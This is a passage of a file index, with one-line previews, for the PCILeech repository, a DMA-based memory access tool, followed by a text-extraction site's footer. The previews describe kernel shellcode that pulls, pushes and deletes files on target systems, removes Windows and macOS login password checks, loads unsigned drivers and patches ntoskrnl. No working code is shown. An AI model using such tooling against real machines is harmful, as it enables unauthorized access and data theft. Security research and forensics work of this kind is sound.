"preview": "// vfslist.h : definitions related to virtual file system support.\n//\n// (c) Ulf Frisk, 2018-2026\n// Author: Ulf Frisk, "
},
{
"path": "pcileech/vmmx.c",
"chars": 1709,
"preview": "// vmmx.h : implementation of external memory process file system functionality.\n//\n// (c) Ulf Frisk, 2020-2026\n// Autho"
},
{
"path": "pcileech/vmmx.h",
"chars": 756,
"preview": "// vmmx.h : definitions related to external memory process file system functionality.\n//\n// (c) Ulf Frisk, 2020-2026\n// "
},
{
"path": "pcileech.sln",
"chars": 6721,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.2872"
},
{
"path": "pcileech_shellcode/fbsdx64_common.c",
"chars": 216,
"preview": "// fbsdx64_common.c : support functions used by FreeBSD KMDs started by stage3 EXEC.\n// Compatible with FreeBSD x64.\n//\n"
},
{
"path": "pcileech_shellcode/fbsdx64_common.h",
"chars": 3059,
"preview": "// fbsdx64_common.h : declarations of commonly used shellcode functions\n// Compatible with FreeBSD x64.\n//\n// Author: Ul"
},
{
"path": "pcileech_shellcode/fbsdx64_common_a.asm",
"chars": 3217,
"preview": "; fbsdx64_common_a.asm : assembly to receive execution from stage3 exec command.\n; Compatible with FreeBSD x64.\n;\n; (c) "
},
{
"path": "pcileech_shellcode/fbsdx64_filepull.c",
"chars": 5287,
"preview": "// fbsdx64_filepull.c : kernel code to pull files from target system.\n// Compatible with FreeBSD x64.\n//\n// (c) Ulf Fris"
},
{
"path": "pcileech_shellcode/fbsdx64_stage2.asm",
"chars": 4913,
"preview": "; fbsdx64_stage2.asm : assembly to receive execution from stage1 shellcode.\n; Compatible with FreeBSD x64.\n;\n; (c) Ulf F"
},
{
"path": "pcileech_shellcode/fbsdx64_stage3.asm",
"chars": 5195,
"preview": "; fbsdx64_stage3.asm : assembly to receive execution from stage2 shellcode.\n; Compatible with FreeBSD x64.\n;\n; (c) Ulf F"
},
{
"path": "pcileech_shellcode/fbsdx64_stage3_c.c",
"chars": 7664,
"preview": "// fbsdx64_stage3_c.c : stage3 main shellcode.\n// Compatible with FreeBSD x64.\n//\n// (c) Ulf Frisk, 2016, 2017\n// Author"
},
{
"path": "pcileech_shellcode/info_kmd_core.txt",
"chars": 5793,
"preview": "# compile instructions for the various kernel module shellcode sources.\n#\n#======================================== UEFI"
},
{
"path": "pcileech_shellcode/lx64_common.c",
"chars": 1233,
"preview": "// lx64_common.c : support functions used by Linux x64 KMDs started by stage3 EXEC.\n// Compatible with Linux x64.\n//\n// "
},
{
"path": "pcileech_shellcode/lx64_common.h",
"chars": 5289,
"preview": "// lx64_common.h : declarations of commonly used shellcode functions\n// Compatible with Linux x64.\n//\n// Author: Ulf Fri"
},
{
"path": "pcileech_shellcode/lx64_common_a.asm",
"chars": 5647,
"preview": "; lx64_common_a.asm : assembly to receive execution from stage3 exec command.\n; Compatible with Linux x64.\n;\n; (c) Ulf F"
},
{
"path": "pcileech_shellcode/lx64_exec_root.c",
"chars": 2471,
"preview": "// lx64_exec_root.c : execute user-mode command from kernel\n//\n// compile with:\n// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /G"
},
{
"path": "pcileech_shellcode/lx64_filedelete.c",
"chars": 3292,
"preview": "// lx64_filedelete.c : kernel code to delete files from target system.\n// Compatible with Linux x64.\n//\n// (c) Ulf Frisk"
},
{
"path": "pcileech_shellcode/lx64_filepull.c",
"chars": 3325,
"preview": "// lx64_filepull.c : kernel code to pull files from target system.\n// Compatible with Linux x64.\n//\n// (c) Ulf Frisk, 20"
},
{
"path": "pcileech_shellcode/lx64_filepush.c",
"chars": 3775,
"preview": "// lx64_filepush.c : kernel code to push files to target system.\n// Compatible with Linux x64.\n//\n// (c) Ulf Frisk, 2016"
},
{
"path": "pcileech_shellcode/lx64_stage2.asm",
"chars": 8456,
"preview": "; lx64_stage2.asm : assembly to receive execution from stage1 shellcode.\n; Compatible with Linux x64.\n;\n; (c) Ulf Frisk,"
},
{
"path": "pcileech_shellcode/lx64_stage2_efi.asm",
"chars": 15521,
"preview": "; lx64_stage2_efi.asm : assembly to receive execution from hooked efi runtime services dispatch table.\n; Compatible with"
},
{
"path": "pcileech_shellcode/lx64_stage3.asm",
"chars": 11357,
"preview": "; lx64_stage3.asm : assembly to receive execution from stage2 shellcode.\n; Compatible with Linux x64.\n;\n; (c) Ulf Frisk,"
},
{
"path": "pcileech_shellcode/lx64_stage3_c.c",
"chars": 15040,
"preview": "// lx64_stage3_c.c : stage3 main shellcode.\n// Compatible with Linux x64.\n//\n// (c) Ulf Frisk, 2016-2024\n// Author: Ulf "
},
{
"path": "pcileech_shellcode/lx64_stage3_pre.asm",
"chars": 888,
"preview": "; lx64_stage3_pre.asm : assembly wait loop to wait for continue when executable code exists after.\n; Compatible with Lin"
},
{
"path": "pcileech_shellcode/lx64_vfs.c",
"chars": 14373,
"preview": "// lx64_vfs.c : kernel code to support the PCILeech file system.\n// Compatible with Linux x64.\n//\n// (c) Ulf Frisk, 2017"
},
{
"path": "pcileech_shellcode/macos_common.c",
"chars": 4821,
"preview": "// macos_common.c : support functions used by macOS KMDs started by stage3 EXEC.\n// Compatible with macOS.\n//\n// (c) Ulf"
},
{
"path": "pcileech_shellcode/macos_common.h",
"chars": 6684,
"preview": "// macos_common.h : definitions of commonly used shellcode functions\n// Compatible with macOS.\n//\n// Author: Ulf Frisk, "
},
{
"path": "pcileech_shellcode/macos_common_a.asm",
"chars": 5547,
"preview": "; macos_common_a.asm : assembly to receive execution from stage3 exec command.\n; Compatible with macOS.\n;\n; (c) Ulf Fris"
},
{
"path": "pcileech_shellcode/macos_filedelete.c",
"chars": 6203,
"preview": "// ax64_filedelete.c : kernel code to delete files on target system.\n// Compatible with Apple OS X.\n//\n// TODO: THIS IS "
},
{
"path": "pcileech_shellcode/macos_filepull.c",
"chars": 4356,
"preview": "// macos_filepull.c : kernel code to pull files from target system.\n// Compatible with Apple macOS.\n//\n// (c) Ulf Frisk,"
},
{
"path": "pcileech_shellcode/macos_filepush.c",
"chars": 4424,
"preview": "// macos_filepush.c : kernel code to push files to target system.\n// Compatible with Apple macOS.\n//\n// (c) Ulf Frisk, 2"
},
{
"path": "pcileech_shellcode/macos_stage2.asm",
"chars": 9160,
"preview": "; ax64_stage2.asm : assembly to receive execution from stage1 shellcode.\n; Compatible with OS X.\n;\n; (c) Ulf Frisk, 2016"
},
{
"path": "pcileech_shellcode/macos_stage3.asm",
"chars": 7169,
"preview": "; ax64_stage3.asm : assembly to receive execution from stage2 shellcode.\n; Compatible with OS X.\n;\n; (c) Ulf Frisk, 2016"
},
{
"path": "pcileech_shellcode/macos_stage3_c.c",
"chars": 10737,
"preview": "// ax64_stage3_c.c : stage3 main shellcode.\n// Compatible with macOS.\n//\n// (c) Ulf Frisk, 2016, 2017\n// Author: Ulf Fri"
},
{
"path": "pcileech_shellcode/macos_unlock.c",
"chars": 4793,
"preview": "// macos_unlock.c : kernel code to remove the password requirement when logging on to macOS.\n//\n// (c) Ulf Frisk, 2016, "
},
{
"path": "pcileech_shellcode/macos_vfs.c",
"chars": 14124,
"preview": "// macos_vfs.c : kernel code to support the PCILeech file system.\n// Compatible with Apple macOS.\n//\n// (c) Ulf Frisk, 2"
},
{
"path": "pcileech_shellcode/pcileech_shellcode.vcxproj",
"chars": 5583,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.micros"
},
{
"path": "pcileech_shellcode/pcileech_shellcode.vcxproj.filters",
"chars": 8900,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "pcileech_shellcode/pcileech_shellcode.vcxproj.user",
"chars": 160,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "pcileech_shellcode/statuscodes.h",
"chars": 1120,
"preview": "// statuscodes_common.h : status codes for non-windows kernel implants.\n//\n// Author: Ulf Frisk, pcileech@frizk.net\n//\n\n"
},
{
"path": "pcileech_shellcode/uefi_common.c",
"chars": 207,
"preview": "// uefi_common.c : support functions used by UEFI x64 KMDs started by stage3 EXEC.\n// Compatible with UEFI x64.\n//\n// (c"
},
{
"path": "pcileech_shellcode/uefi_common.h",
"chars": 9300,
"preview": "// uefi_common.h : declarations of commonly used shellcode functions\n// Compatible with UEFI.\n//\n// Author: Ulf Frisk, p"
},
{
"path": "pcileech_shellcode/uefi_common_a.asm",
"chars": 1686,
"preview": "; uefi_common_a.asm : assembly to receive execution from stage3 exec command.\n; Compatible with UEFI x64.\n;\n; (c) Ulf Fr"
},
{
"path": "pcileech_shellcode/uefi_kmd.asm",
"chars": 2840,
"preview": "; uefi_kmd.asm : assembly to receive execution from hooked UEFI\n; function call. Compatible with UEFI x64.\n;\n; - Executi"
},
{
"path": "pcileech_shellcode/uefi_kmd_c.c",
"chars": 9411,
"preview": "// uefi_kmd_c.c : stage3 main shellcode.\n// Compatible with UEFI x64.\n//\n// (c) Ulf Frisk, 2017\n// Author: Ulf Frisk, pc"
},
{
"path": "pcileech_shellcode/uefi_textout.c",
"chars": 1901,
"preview": "// uefi_textout.c : prints some text on the screen.\n//\n// (c) Ulf Frisk, 2017\n// Author: Ulf Frisk, pcileech@frizk.net\n/"
},
{
"path": "pcileech_shellcode/uefi_winload_ntos_kmd.asm",
"chars": 1863,
"preview": "; uefi_winload_ntos_kmd.asm : assembly to receive execution from hooked function PsCreateSystemThread at end of executio"
},
{
"path": "pcileech_shellcode/uefi_winload_ntos_kmd_c.c",
"chars": 15381,
"preview": "// uefi_winload_ntos_kmd_c.c : special kmd for use in pre-patched ntoskrnl.exe with VBS enforced code integrity\n//\n// (p"
},
{
"path": "pcileech_shellcode/uefi_winload_ntos_patch.c",
"chars": 59499,
"preview": "// uefi_winload_ntos_patch.c : hooks/patches ntoskrnl.exe!PsCreateSystemThreadEx with evil code.\n// evil code consists o"
},
{
"path": "pcileech_shellcode/wx64_common.c",
"chars": 5364,
"preview": "// wx64_common.c : support functions used by Windows x64 KMDs started by stage3 EXEC.\n// Compatible with Windows x64.\n//"
},
{
"path": "pcileech_shellcode/wx64_common.h",
"chars": 13242,
"preview": "// wx64_common.h : declarations of commonly used shellcode functions\n// Compatible with Windows x64.\n//\n// Author: Ulf F"
},
{
"path": "pcileech_shellcode/wx64_common_a.asm",
"chars": 761,
"preview": "; wx64_common_a.asm : assembly to receive execution from stage3 exec command.\n; Compatible with Windowx 64.\n;\n; (c) Ulf "
},
{
"path": "pcileech_shellcode/wx64_driverinfo.c",
"chars": 4929,
"preview": "// wx64_driverinfo.c : kernel code to list loaded drivers\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, 2016\n// A"
},
{
"path": "pcileech_shellcode/wx64_driverload_svc.c",
"chars": 10484,
"preview": "// wx64_driverload_svc.c : kernel code to load both unsigned and signed drivers.\n//\n// (c) Ulf Frisk, 2016\n// Author: Ul"
},
{
"path": "pcileech_shellcode/wx64_driverunload.c",
"chars": 2197,
"preview": "// wx64_driverunload.c : kernel code to unload already loaded drivers.\n// Compatible with Windows x64.\n//\n// (c) Ulf Fri"
},
{
"path": "pcileech_shellcode/wx64_exec_user.asm",
"chars": 1345,
"preview": "; wx64_exec_user.asm : assembly to receive execution from APC in user mode.\n;\n; (c) Ulf Frisk, 2016\n; Author: Ulf Frisk,"
},
{
"path": "pcileech_shellcode/wx64_exec_user_c.c",
"chars": 10235,
"preview": "// wx64_exec_user_c.c : usermode code to be injected into user process to spawn new processes.\n//\n// (c) Ulf Frisk, 2016"
},
{
"path": "pcileech_shellcode/wx64_filepull.c",
"chars": 3346,
"preview": "// wx64_filepull.c : kernel code to pull files from target system.\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, "
},
{
"path": "pcileech_shellcode/wx64_filepush.c",
"chars": 3140,
"preview": "// wx64_filepush.c : kernel code to push files to target system.\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, 20"
},
{
"path": "pcileech_shellcode/wx64_pageinfo.asm",
"chars": 891,
"preview": "; wx64_pageinfo.asm : shellcode assembly for retrieving various CPU registers.\n;\n; (c) Ulf Frisk, 2016\n; Author: Ulf Fri"
},
{
"path": "pcileech_shellcode/wx64_pagesignature.c",
"chars": 7216,
"preview": "// wx64_pagesignature.c : kernel code to create a page signature from system module / driver.\n//\n// (c) Ulf Frisk, 2016\n"
},
{
"path": "pcileech_shellcode/wx64_psblue.asm",
"chars": 1123,
"preview": "; wx64_psblue.asm : shellcode assembly to just bluescreen the computer due to invalid opcodes\n;\n; (c) Ulf Frisk, 2016\n; "
},
{
"path": "pcileech_shellcode/wx64_pscreate.c",
"chars": 33096,
"preview": "// wx64_pscreate.c : create/spawn new user mode processes.\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, 2016\n// "
},
{
"path": "pcileech_shellcode/wx64_pskill.c",
"chars": 3387,
"preview": "// wx64_pskill.c : kernel code to terminate running processes.\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, 2016"
},
{
"path": "pcileech_shellcode/wx64_pslist.c",
"chars": 4913,
"preview": "// wx64_pslist.c : kernel code to list running processes (name and PID).\n// Compatible with Windows x64.\n//\n// (c) Ulf F"
},
{
"path": "pcileech_shellcode/wx64_stage1.asm",
"chars": 657,
"preview": "; wx64_stage1.asm : assembly to redirect hook to larger code section.\n;\n; (c) Ulf Frisk, 2016\n; Author: Ulf Frisk, pcile"
},
{
"path": "pcileech_shellcode/wx64_stage2.asm",
"chars": 6606,
"preview": "; wx64_stage2.asm : assembly to receive execution from stage1 shellcode.\n;\n; (c) Ulf Frisk, 2016\n; Author: Ulf Frisk, pc"
},
{
"path": "pcileech_shellcode/wx64_stage23_vmm.asm",
"chars": 4646,
"preview": "; wx64_stage23_vmm.asm : assembly to receive execution from initial hook\n; based on the memory process file system assis"
},
{
"path": "pcileech_shellcode/wx64_stage23_vmm3.asm",
"chars": 4393,
"preview": "; wx64_stage23_vmm3.asm : assembly for the WIN10_X64_3 KMD inject.\n;\n; (c) Ulf Frisk, 2020\n; Author: Ulf Frisk, pcileech"
},
{
"path": "pcileech_shellcode/wx64_stage2_hal.asm",
"chars": 7547,
"preview": "; wx64_stage2.asm : assembly modified for the hal.dll heap injection technique.\n;\n; (c) Ulf Frisk, 2016, 2017\n; Author: "
},
{
"path": "pcileech_shellcode/wx64_stage3.asm",
"chars": 791,
"preview": "; wx64_stage3.asm : assembly to receive execution from stage2 shellcode.\n;\n; (c) Ulf Frisk, 2016\n; Author: Ulf Frisk, pc"
},
{
"path": "pcileech_shellcode/wx64_stage3_c.c",
"chars": 11745,
"preview": "// wx64_stage3_c.c : stage3 main shellcode.\n//\n// (c) Ulf Frisk, 2016, 2017\n// Author: Ulf Frisk, pcileech@frizk.net\n//\n"
},
{
"path": "pcileech_shellcode/wx64_stage3_pre.asm",
"chars": 794,
"preview": "; wx64_stage3_pre.asm : assembly wait loop to wait for continue when executable code exists after\n;\n; (c) Ulf Frisk, 201"
},
{
"path": "pcileech_shellcode/wx64_umd_exec.asm",
"chars": 1502,
"preview": "; wx64_umd_exec.asm : assembly to receive execution from initial hook in user-mode shellcode (umd).\n;\n; (c) Ulf Frisk, 2"
},
{
"path": "pcileech_shellcode/wx64_umd_exec_c.c",
"chars": 9417,
"preview": "// wx64_umd_exec_c.c : usermode 'umd' shellcode for PCILeech for starting and\n// and executing a pro"
},
{
"path": "pcileech_shellcode/wx64_unlock.c",
"chars": 19892,
"preview": "// wx64_unlock.c : kernel code to remove the password requirement when logging on to Windows.\n//\n// (c) Ulf Frisk, 2016-"
},
{
"path": "pcileech_shellcode/wx64_vfs.c",
"chars": 9343,
"preview": "// wx64_vfs.c : kernel code to support the PCILeech file system.\n// Compatible with Windows x64.\n//\n// (c) Ulf Frisk, 20"
},
{
"path": "readme.md",
"chars": 20313,
"preview": "PCILeech Summary:\n=================\nPCILeech uses PCIe hardware devices to read and write target system memory. This is "
},
{
"path": "usb3380.md",
"chars": 2780,
"preview": "USB3380 Hardware:\n=================\nPCILeech uses PCIe hardware devices to read and write from the target system memory."
},
{
"path": "usb3380_flash/linux/Makefile",
"chars": 164,
"preview": "obj-m += pcileech_flash.o\n\nall:\n\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules\n\nclean:\n\tmake -C /lib/mod"
},
{
"path": "usb3380_flash/linux/pcileech_flash.c",
"chars": 7528,
"preview": "// pcileech_flash.c : Linux kernel module to flash the USB3380 into a PCILeech device.\n//\n// (c) Ulf Frisk, 2016. 2017\n/"
},
{
"path": "usb3380_flash/linux/readme.md",
"chars": 1752,
"preview": "Flashing Hardware in Linux:\n===============================\nIn order to turn the USB3380 development board into a PCILee"
},
{
"path": "usb3380_flash/linux/readme_flash.txt",
"chars": 75,
"preview": "Please consult the documentation in pcileech_flash.c for more information.\n"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.c",
"chars": 6583,
"preview": "// installer.c : implementation of the PCILeech UMDF2 flash driver.\n//\n// (c) Ulf Frisk, 2016, 2017\n// Author: Ulf Frisk"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.h",
"chars": 207,
"preview": "// USB3380Flash.h : header for PCILeech UMDF2 flash driver.\n//\n// Author: Ulf Frisk, pcileech@frizk.net\n//\n#include <win"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.user",
"chars": 140,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.vcxproj",
"chars": 6037,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"12.0\" xmlns=\"http://schemas.micros"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.vcxproj.filters",
"chars": 1355,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "usb3380_flash/windows/USB3380Flash/USB3380Flash.vcxproj.user",
"chars": 160,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "usb3380_flash/windows/USB3380Flash_Installer/USB3380Flash_Installer.vcxproj",
"chars": 8397,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.micros"
},
{
"path": "usb3380_flash/windows/USB3380Flash_Installer/USB3380Flash_Installer.vcxproj.filters",
"chars": 936,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "usb3380_flash/windows/USB3380Flash_Installer/USB3380Flash_Installer.vcxproj.user",
"chars": 160,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "usb3380_flash/windows/USB3380Flash_Installer/installer.c",
"chars": 10228,
"preview": "// installer.c : flash driver installation program.\n// required to get around windows code signing requirement when impo"
}
]
// ... and 31 more files (download for full content)
About this extraction
This page contains the full source code of the ufrisk/pcileech GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 189 files (1.7 MB), approximately 636.7k tokens, and a symbol index with 1105 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.